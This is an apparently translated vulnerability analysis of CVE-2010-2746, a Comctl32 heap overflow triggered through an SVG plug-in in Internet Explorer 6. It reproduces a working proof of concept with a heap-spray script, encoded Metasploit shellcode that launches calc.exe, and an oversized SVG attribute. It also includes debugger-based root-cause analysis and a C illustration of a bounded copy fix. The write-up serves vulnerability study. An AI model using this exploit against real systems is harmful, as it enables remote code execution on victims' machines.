CVE-2010-2746 analysis: Microsoft Windows Common Control Library (Comctl32) heap overflow (MS10-081)

Source: Internet
Author: User
Tags cve

Related links:

Exploit-DB: https://www.exploit-db.com/exploits/15963/

Microsoft Security Bulletin: https://technet.microsoft.com/library/security/ms10-081

Vulnerability description:

According to Microsoft's bulletin, a remote code execution vulnerability exists because the Windows Common Control Library, Comctl32.dll, does not properly handle certain messages when a third-party Scalable Vector Graphics (SVG) viewer is in use. The bulletin describes it as a heap overflow vulnerability.

Environment:

(1) Windows XP Professional SP3
(2) Internet Explorer 6.0.2900.5512
(3) Ruby 1.9
(4) IE8 and earlier do not support SVG natively, so the SVGView plug-in must be installed.

Reproducing the vulnerability:

Download the Ruby script provided by Exploit-DB. When run, it listens on port 55555 and serves an HTML page containing heap-spray JavaScript and an iframe that loads an SVG file. The SVG defines a rectangle whose transform attribute holds an anomalous value: 65,535 "\x21" characters. The main contents of the script are as follows:

    transform_name = "\x21" * 65535
    svg = <<-SVG
    <?xml version="1.0"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
      <rect x="…" y="…" height="…" width="…" style="fill: #ffffff"
            transform="#{transform_name} (translate) rotate(…)"></rect>
      <text x="…" y="…">click me</text>
    </svg>
    SVG
    html = <<-HTML
    <body>
    <script>
    function str_dup(str, length) {
        var result = str;
        while (result.length < length) { result += result; }
        return result.substr(result.length - length);
    }
    var shellcode = unescape("%u9000%u9090%u9090") +
        // msfpayload windows/exec CMD=calc.exe R | msfencode -t js_le -b "\x00"
        unescape("%u39ba%ue680%udb4f%u29dc%ub1c9%ud933%u2474%u58f4" +
                 "%u5031%u8313%u04c0%u5003%u6236%ub313%ueba0%u4cdc" +
                 "%u8c30%ua955%u9e01%ub902%u2e33%uef40%uc5bf%u0404" +
                 "%uab34%u2b80%u06fd%u02f7%ua6fe%uc837%ua83c%u13cb" +
                 "%u0a10%udbf5%u4b65%u0132%u1985%u4deb%u8e37%u1098" +
                 "%uaf8b%u1f4e%ud7b3%ue0eb%u6247%u30f5%uf9f7%ua8bd" +
                 "%ua57c%uc81d%ub551%u8362%u0ede%u1210%u5f36%u24d9" +
                 "%u0c76%u88e4%u4c7b%u2e20%u3b63%u4c5a%u3c1e%u2e99" +
                 "%uc9c4%u883c%u6a8f%u28e5%uec5c%u266e%u7a29%u2b28" +
                 "%uafac%u5742%u4e25%ud185%u757d%ub901%u1426%u6710" +
                 "%u2989%ucf42%u8c76%ue208%ub663%u6952%u3a72%ud4e9" +
                 "%u4474%u76f2%u751c%u1979%u8a5b%u5da8%uc093%uf4f1" +
                 "%u8d3b%u4563%u2e26%u8a5e%uad5e%u736b%uada5%u7619" +
                 "%u69e2%u0af1%u1c7b%ub9f5%u357c%u5c96%ud5ee%ufa77" +
                 "%u7c96%u0e88");
    var base = str_dup(unescape("%u2100"), 0x800 - shellcode.length);
    var arr = [];
    for (var i = 0; i < …; i++) {
        arr[i] = document.createElement("a");
        arr[i].innerHTML = [base + shellcode].join("");
    }
    </script>
    <iframe width="100%" height="100%" src="poc.svg" marginheight="0" marginwidth="0"></iframe>
    </body>
    HTML

Open IE with WinDbg attached and browse to http://localhost:55555; the page shown below appears. Clicking "click me" runs the shellcode and pops up the calculator. It is also normal for nothing to happen, because the overflow does not always overwrite the expected data.

Because this is a heap overflow, page heap (the gflags hpa setting) is enabled to locate the overflowing code.

When the mouse moves over the content, a memory access exception occurs in the COMCTL32 module. The fault happens while writing CX to the address in EDX; the value of CX is the anomalous attribute character, 0x21.

The faulting function is located in IDA as comctl32!StringCopyWorkerW. Note that the Comctl32.dll involved is not the one under System32 but the one in the WinSxS directory, which stores multiple versions of system components; its exact path can be seen with the WinDbg command lm v m comctl32. The function copies the specified number of characters to the destination address.

Looking at the call stack, 0xfff2 characters remain to be copied, from 0x0c92afe8 to 0x0bb6afe4.

The destination heap block is only 0x20 bytes in size, and the overflow occurs because there is no limit on the size of the copy.

The source is the attribute value: 65,535 characters of 0x21.

Next, determine where the destination address and the source size come from. Looking at the caller, comctl32!SBGetText, and decompiling it with IDA's F5, both are found to come from the caller above it, comctl32!StatusWndProc.

Following the return address from the call stack into comctl32!StatusWndProc: parameter 4 is 0x10000, and parameter 3, lParam, is a heap address with a size of 0x20.
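The root cause the analysis arrives at is a copy worker that trusts a caller-supplied character count (0x10000) while the destination heap block is only 0x20 bytes. The following C program is an added illustration written for this page; it is not code from the page, from comctl32 or from the exploit, and the function names (unbounded_copy_bytes, copy_worker_bounded, demo_bounded_copy) and the WCHAR typedef are assumptions made here. Only the three sizes (0x20-byte block, 0x10000 count, 65,535 source characters) are taken from the analysis above. It computes how far a count-only copy would write past the block, and shows the bounded form of the worker, which takes the destination capacity as a parameter and truncates.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Model of a Windows WCHAR (UTF-16 code unit) so the byte arithmetic matches
 * the 32-bit Windows target regardless of the host's sizeof(wchar_t). */
typedef uint16_t WCHAR;

#define DST_HEAP_BYTES 0x20u     /* size of the lParam heap block seen in StatusWndProc */
#define CALLER_CCH     0x10000u  /* character count passed as parameter 4 */
#define SRC_CCH        0xFFFFu   /* 65,535 "\x21" characters in the transform attribute */

/* Bytes an unbounded copy worker writes when it trusts only the caller's
 * count: every source character up to that count, plus the terminating NUL. */
static size_t unbounded_copy_bytes(size_t src_cch, size_t caller_cch)
{
    size_t copied = src_cch < caller_cch ? src_cch : caller_cch;
    return (copied + 1) * sizeof(WCHAR);
}

/* The question a code reviewer wants answered: can the caller's count alone
 * keep the write inside the destination block? */
static bool unbounded_copy_overflows(size_t dst_bytes, size_t src_cch, size_t caller_cch)
{
    return unbounded_copy_bytes(src_cch, caller_cch) > dst_bytes;
}

/* Hardened worker (hypothetical, not comctl32's code): the copy is bounded by
 * the destination's real capacity, which the caller passes alongside the
 * buffer. Truncates and always NUL-terminates. Returns characters copied
 * (excluding the NUL), or SIZE_MAX if dst cannot hold even the terminator. */
static size_t copy_worker_bounded(WCHAR *dst, size_t dst_bytes,
                                  const WCHAR *src, size_t caller_cch)
{
    if (dst == NULL || src == NULL || dst_bytes < sizeof(WCHAR)) return SIZE_MAX;
    size_t cap_cch = dst_bytes / sizeof(WCHAR) - 1;      /* leave room for the NUL */
    size_t limit = caller_cch < cap_cch ? caller_cch : cap_cch;
    size_t i = 0;
    while (i < limit && src[i] != 0) {
        dst[i] = src[i];
        i++;
    }
    dst[i] = 0;
    return i;
}

/* Constructed input: cch copies of 0x21 ('!'), like the PoC's transform value. */
static WCHAR *make_attribute_value(size_t cch)
{
    WCHAR *s = malloc((cch + 1) * sizeof(WCHAR));
    if (s == NULL) return NULL;
    for (size_t i = 0; i < cch; i++) s[i] = 0x21;
    s[cch] = 0;
    return s;
}

/* Runs the bounded worker on the 65,535-character value into a 0x20-byte block
 * and returns how many characters survived (0x20 / 2 minus the NUL = 15), or
 * SIZE_MAX if the result is not NUL-terminated inside the block. */
static size_t demo_bounded_copy(void)
{
    WCHAR *src = make_attribute_value(SRC_CCH);
    if (src == NULL) return SIZE_MAX;
    WCHAR block[DST_HEAP_BYTES / sizeof(WCHAR)];
    size_t n = copy_worker_bounded(block, sizeof block, src, CALLER_CCH);
    free(src);
    if (n == SIZE_MAX || n >= sizeof block / sizeof block[0] || block[n] != 0) return SIZE_MAX;
    return n;
}

int main(void)
{
    printf("unbounded worker would write 0x%zx bytes into a 0x%x-byte block: %s\n",
           unbounded_copy_bytes(SRC_CCH, CALLER_CCH), DST_HEAP_BYTES,
           unbounded_copy_overflows(DST_HEAP_BYTES, SRC_CCH, CALLER_CCH) ? "overflow" : "fits");
    printf("bounded worker kept %zu characters\n", demo_bounded_copy());
    return 0;
}
```

The point of the bounded variant is that the length limit is derived from the buffer the callee is actually writing into, not from a count that arrives with the message; in the vulnerable path the 0x10000 count says nothing about the 0x20-byte block, so the attribute value's length alone decides how far the write goes.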

To follow how the shellcode gets executed, turn page heap off. Change the first byte of the shellcode to 0xcc (int 3) so the process breaks into the debugger at that point, and restart the Ruby script.

Debug again; this may take several attempts. Once the breakpoint hits, take a snapshot of the virtual machine to make further debugging easier.

The call stack shows that the return address for the current EIP is 0x7e278a8a.

Looking at the code just before that return address, the shellcode is reached through call [eax+0e0h].

Locating mshtml!CServer::WndProc in IDA:

at this point ESI has already been overwritten with 0x00210021.

Debugging mshtml!CServer::WndProc again to see the data before ESI is overwritten shows that the overwritten object is the CDoc object, and the virtual function called here is CDoc::OnWindowMessage.

    
